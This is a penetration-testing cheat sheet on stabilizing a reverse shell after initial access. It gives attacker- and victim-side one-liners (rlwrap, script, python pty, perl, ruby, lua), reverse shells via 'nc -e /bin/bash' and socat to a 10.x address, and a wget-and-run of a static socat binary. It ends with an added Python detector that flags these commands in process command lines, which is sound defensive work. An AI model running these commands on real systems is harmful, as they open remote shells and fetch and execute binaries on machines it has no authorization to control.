Shell Balancing

After initial access to a machine we need to stabilize our shell. There are various ways to do this; we will be looking over them.

Example of a bad shell

Upgrade reverse shell to fully usable TTY shell

rlwrap

  • When receiving the connection from the target machine we can wrap the listener in rlwrap.

  • This mitigates some of the restrictions of poor netcat shells (no line editing, no history) by wrapping the netcat listener with the rlwrap command.

  • It is not installed by default, so install it with sudo apt install rlwrap.

rlwrap nc -lvnp $port

Using env-call and script

  • This sets the SHELL environment variable for the script command, which then spawns a PTY running that shell (here /bin/bash) instead of the default system shell.

SHELL=/bin/bash script -q /dev/null

Using Script

  • script comes pre-installed

  • check the man page

  • -q is for quiet, -c is for command

# on victim machine
/usr/bin/script -qc /bin/bash /dev/null

ctrl+z

# on attacker machine
stty raw -echo; fg; reset

Python

  • Python is a great tool for stabilizing the shell.

# on victim machine
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

# on attacker machine
stty raw -echo
fg
# on victim machine
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>    # use the values shown by stty -a on the attacker terminal

Perl

  • If Python is not installed but Perl is available on the box, we can use this. Note that unlike pty.spawn, the exec one-liners in this and the following sections only replace the current process with a shell; they do not allocate a PTY.

perl -e 'exec "/bin/sh";'

Ruby

  • If Ruby is installed on the box.

# the Ruby code to run:
exec "/bin/sh"

# as a one-liner from the command line:
ruby -e 'exec "/bin/sh"'

Lua

lua -e "os.execute('/bin/sh')"

Copy over NC and spawn a shell

  • Using wget and Python's SimpleHTTPServer module, nc can easily be moved over to the target.

  • Here we copy nc to the victim machine and then receive the shell. The copied nc must be a build that supports -e (e.g. netcat-traditional); the OpenBSD variant does not.

# Attacker Machine

cp /usr/bin/nc . ; python -m SimpleHTTPServer 9998    # python3: python3 -m http.server 9998
nc -nlvp 9999    # listener on a separate port, since 9998 is already bound by the HTTP server

# Victim Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9999 -e /bin/bash

Socat

  • Avoid plain nc when receiving connections; use socat instead, which gives a fully interactive shell much like an ssh session.

# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234

# Victim Machine (socat already installed)

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234

# if socat is not present we can use a static binary

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
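As an added defensive example (not part of the original notes), the Python script below flags the TTY-upgrade one-liners documented above when they appear in process command lines, as a process monitor or auditd execve record would expose them; the sample command lines and the rule names are constructed for this example.

```python
import re

# Constructed sample command lines, as a process monitor or auditd execve
# record would expose them; they are not taken from a real host.
SAMPLE_CMDLINES = [
    "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "SHELL=/bin/bash script -q /dev/null",
    "/usr/bin/script -qc /bin/bash /dev/null",
    "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234",
    "./nc 10.x.x.x 9999 -e /bin/bash",
    "lua -e \"os.execute('/bin/sh')\"",
    "script -q typescript",          # legitimate session recording: no hit
    "python3 manage.py runserver",   # ordinary interpreter use: no hit
]

# One rule per technique documented above: (rule name, compiled regex).
RULES = [
    ("pty_spawn_shell", re.compile(r"\bpty\.spawn\(\s*['\"]/bin/(ba)?sh['\"]")),
    ("script_env_shell", re.compile(r"\bSHELL=/bin/\S+\s+script\b")),
    ("script_pty_shell", re.compile(r"\bscript\b.*-[a-z]*c\s+/bin/(ba)?sh\b.*/dev/null")),
    ("socat_exec_pty", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b")),
    ("nc_exec_shell", re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh\b")),
    ("interp_exec_shell", re.compile(r"\b(perl|ruby|lua)\b.*\bexec.*/bin/(ba)?sh\b")),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, rule names) for each line matching at least one rule."""
    hits = [(line, classify(line)) for line in cmdlines]
    return [(line, names) for line, names in hits if names]


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(f"{','.join(names):18s} {line}")
```

Command-line matching is a first-pass signal only; correlate with the parent process (a web server or service account spawning an interpreter) and with new listening or outbound connections before treating a hit as confirmed.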
